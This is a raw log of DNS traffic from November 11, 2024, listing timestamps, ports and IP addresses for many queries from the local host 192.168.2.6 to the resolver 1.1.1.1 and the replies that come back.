Nov 11, 2024 18:13:41.090111017 CET	65267	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.091223955 CET	58996	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.091407061 CET	53428	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.093483925 CET	53	60801	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.095043898 CET	53	57953	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.097516060 CET	53	65267	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.117126942 CET	49670	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.117333889 CET	60111	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.121280909 CET	53657	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.121459007 CET	57153	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.121633053 CET	61149	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.121916056 CET	62752	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.122118950 CET	53832	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.122200012 CET	53	53428	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.122638941 CET	60321	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.122818947 CET	51560	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.122992992 CET	63573	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.123019934 CET	53	58996	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.123990059 CET	54027	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.124181986 CET	61820	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.124552011 CET	64223	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.126095057 CET	60894	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.128026009 CET	53	60111	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.129070044 CET	53	49670	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.130829096 CET	53	53832	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.131333113 CET	58570	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.132174015 CET	61740	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.132440090 CET	53	53657	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.132468939 CET	53	57153	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.132669926 CET	53	61149	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.132682085 CET	53	60321	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.133097887 CET	53	62752	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.133472919 CET	53	51560	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.133739948 CET	53	61820	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.134125948 CET	53	54027	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.134732962 CET	61929	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.134900093 CET	56329	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.135834932 CET	62211	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.135909081 CET	53	60894	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.136441946 CET	57157	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.136986017 CET	49864	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.137166023 CET	61293	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.139148951 CET	59935	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.139388084 CET	55288	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.139605045 CET	56746	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.139777899 CET	63661	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.139815092 CET	55946	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.139976978 CET	57828	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.140039921 CET	49251	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.140165091 CET	57249	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.140239954 CET	49610	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.140283108 CET	53	63573	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.140327930 CET	58382	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.140451908 CET	62327	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.140536070 CET	51589	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.140656948 CET	51857	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.140707970 CET	50036	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.140867949 CET	58869	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.141009092 CET	55705	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.141268969 CET	50114	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.141370058 CET	50977	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.141738892 CET	53	61740	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.146553040 CET	53	56329	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.146564007 CET	53	62211	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.146574020 CET	53	57157	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.147156000 CET	53	57249	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.147706985 CET	53	61293	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.147741079 CET	53	62327	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.149182081 CET	53	56746	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.149213076 CET	53	55946	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.150497913 CET	53	50036	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.150536060 CET	53	49251	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.150938988 CET	53	59935	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.151922941 CET	53	51589	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.151933908 CET	53	50977	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.151943922 CET	53	58869	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.152756929 CET	53	61929	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.153050900 CET	53	58382	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.154278040 CET	60566	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:41.154607058 CET	53	55705	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.155848026 CET	53	64223	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.163693905 CET	53	58570	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.168445110 CET	53	49864	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.169924974 CET	53	55288	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.170912981 CET	53	63661	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.171245098 CET	53	57828	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.171926022 CET	53	51857	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.172470093 CET	53	49610	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.173362970 CET	53	50114	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:41.185007095 CET	53	60566	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.245146990 CET	59106	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.246428013 CET	64333	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.251730919 CET	62444	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.256362915 CET	53	64333	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.260353088 CET	55264	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.260941029 CET	61123	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.276710987 CET	53	59106	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.280946016 CET	65113	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.282429934 CET	53	62444	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.283380032 CET	62477	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.291933060 CET	53	55264	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.292453051 CET	53	61123	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.295027018 CET	51676	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.295514107 CET	56954	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.298526049 CET	53	65113	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.302598000 CET	52519	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.306288958 CET	58772	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.307867050 CET	63317	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.313113928 CET	53	52519	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.313615084 CET	53	58772	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.314977884 CET	53	62477	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.317220926 CET	53	63317	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.326457024 CET	53	51676	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.327109098 CET	53	56954	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.412239075 CET	50919	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.423680067 CET	53	50919	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.428751945 CET	58743	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.430495977 CET	65222	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.430655956 CET	64839	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.430828094 CET	63852	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.430953979 CET	57468	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.431108952 CET	57288	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.431238890 CET	53917	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.431387901 CET	64957	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.431524038 CET	61146	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.438385963 CET	53	58743	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.440241098 CET	53	53917	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.440279961 CET	53	64957	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.440660000 CET	53	64839	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.441111088 CET	53	63852	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.441454887 CET	53	57468	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.441817999 CET	53	61146	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.445746899 CET	61281	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.455748081 CET	53	61281	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.461927891 CET	53	65222	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.462181091 CET	61150	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.462321043 CET	53	57288	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.482604027 CET	55295	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.492772102 CET	53	61150	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.493103981 CET	53	55295	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.730587006 CET	52320	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.730954885 CET	56760	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.731118917 CET	53419	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.731280088 CET	54471	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.731415987 CET	60115	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.731558084 CET	60951	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.731693029 CET	61814	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:42.740917921 CET	53	52320	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.741460085 CET	53	56760	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.742188931 CET	53	60951	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.742446899 CET	53	60115	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.743839979 CET	53	54471	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.762056112 CET	53	53419	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:42.763492107 CET	53	61814	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.079340935 CET	60452	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.085671902 CET	56041	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.086635113 CET	60272	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.087475061 CET	62700	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.088430882 CET	56222	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.089121103 CET	53	60452	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.092227936 CET	57954	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.093341112 CET	52366	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.094630003 CET	57339	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.096586943 CET	53	56041	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.099148035 CET	53	62700	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.100056887 CET	53	56222	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.103559971 CET	53	57954	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.103774071 CET	53	57339	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.118097067 CET	53	60272	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.125561953 CET	53	52366	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.147389889 CET	54532	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.147696018 CET	61407	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.147874117 CET	51984	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.148047924 CET	59023	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.148199081 CET	65105	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.149152994 CET	54590	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.149405003 CET	59047	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.149841070 CET	56483	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.150495052 CET	56790	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.150995016 CET	58183	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.151361942 CET	58505	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.152232885 CET	61118	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.152499914 CET	54868	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.152717113 CET	62393	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.154649019 CET	54892	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.154746056 CET	53	61407	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.155123949 CET	56611	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.156533003 CET	62254	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.156696081 CET	54990	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.156944036 CET	53	51984	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.158485889 CET	53	59023	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.158598900 CET	53	65105	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.159941912 CET	53	59047	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.160108089 CET	53	56790	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.160782099 CET	53	58183	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.160849094 CET	53	54590	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.162890911 CET	53	54868	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.162914991 CET	53	58505	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.162926912 CET	53	61118	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.164588928 CET	53	62393	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.165213108 CET	53	54892	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.168684959 CET	53	54990	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.173054934 CET	53	62254	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.180521965 CET	53	54532	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.180531979 CET	53	56483	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.187844992 CET	53	56611	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.189922094 CET	60803	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.190146923 CET	51186	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.190339088 CET	53071	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.190656900 CET	64924	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.200258970 CET	53	51186	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.200305939 CET	53	64924	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.200315952 CET	53	53071	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.201565027 CET	53	60803	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.204962015 CET	62218	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.205225945 CET	54638	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.214140892 CET	53	54638	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.236135006 CET	53	62218	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.252922058 CET	56277	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.263535976 CET	53	56277	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.754741907 CET	57413	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.756254911 CET	59799	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.759484053 CET	51563	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.764704943 CET	53	57413	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.766196012 CET	53	59799	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.766668081 CET	53580	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.769372940 CET	53	51563	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.793488979 CET	55602	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.796132088 CET	54894	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.797626019 CET	53	53580	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.806602955 CET	53	54894	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.808659077 CET	55476	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.809365988 CET	62764	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.820797920 CET	53	62764	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.824604034 CET	53	55602	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.835850000 CET	50513	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.836468935 CET	50984	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.839016914 CET	53	55476	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.841629028 CET	51346	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.846059084 CET	53	50513	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.848967075 CET	53	50984	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.854108095 CET	53	51346	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.863404989 CET	59924	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.871083021 CET	53	59924	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.900897026 CET	59193	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.902214050 CET	50269	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.902412891 CET	64119	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.903104067 CET	53393	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.903414965 CET	51429	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.911514044 CET	53	59193	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.912945032 CET	53	50269	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.913697004 CET	53	64119	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.913718939 CET	53	53393	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.913913965 CET	53	51429	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.925777912 CET	54030	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.927095890 CET	53091	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.927439928 CET	63425	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.927759886 CET	53074	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.928107977 CET	62906	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.928581953 CET	59756	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.929074049 CET	52275	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.929349899 CET	59508	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.929680109 CET	65237	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.929821014 CET	59622	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.930140018 CET	60577	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.930180073 CET	50880	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.930428982 CET	53402	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.931241035 CET	64333	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.931396008 CET	60938	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.931651115 CET	56424	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.931752920 CET	56236	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.932243109 CET	53031	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.933358908 CET	53004	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.934614897 CET	57624	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.936808109 CET	53	54030	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.937037945 CET	53440	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.937397003 CET	53	53091	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.937731981 CET	53	50880	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.939038992 CET	53	52275	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.939377069 CET	54996	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.939704895 CET	53	65237	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.940460920 CET	53	59622	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.940471888 CET	53	53004	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.940821886 CET	53	56424	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.942075968 CET	53	60938	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.942591906 CET	53	56236	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.945928097 CET	53	57624	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.946420908 CET	53	53440	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.946594000 CET	50730	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.946866989 CET	53189	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.948488951 CET	58928	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.948673010 CET	53	60577	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.950637102 CET	53	53031	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.952105045 CET	52608	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.952251911 CET	60802	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.952400923 CET	59604	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.953125000 CET	59044	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.953299046 CET	51595	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.953950882 CET	61049	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.955828905 CET	49292	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.956159115 CET	53027	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.956274033 CET	53	50730	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.957992077 CET	53	53189	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.958564043 CET	53	62906	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.958575010 CET	53	63425	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.959060907 CET	53	53074	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.960223913 CET	53	53402	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.960235119 CET	53	59508	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.961102009 CET	53	59756	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.961112976 CET	53	60802	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.961376905 CET	53	52608	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.961954117 CET	53	64333	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.963531971 CET	53	59044	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.963562012 CET	53	51595	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.963890076 CET	53	61049	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.964788914 CET	53	53027	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.966279030 CET	53	49292	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.969995022 CET	52347	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.970907927 CET	56481	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.971086025 CET	53615	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.971230984 CET	50505	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.971422911 CET	59916	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.972134113 CET	58332	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.972274065 CET	54307	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.972400904 CET	63956	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.972539902 CET	52851	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.972682953 CET	51012	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.972820997 CET	62513	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.973361969 CET	53	54996	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.975052118 CET	49380	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.978091002 CET	57969	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.978276014 CET	52726	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.978451967 CET	55002	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.978678942 CET	51508	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.980148077 CET	53	63956	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.980161905 CET	53	58928	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.980915070 CET	53	53615	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.981163979 CET	52563	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.982428074 CET	53	62513	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.984638929 CET	53	59604	1.1.1.1	192.168.2.6
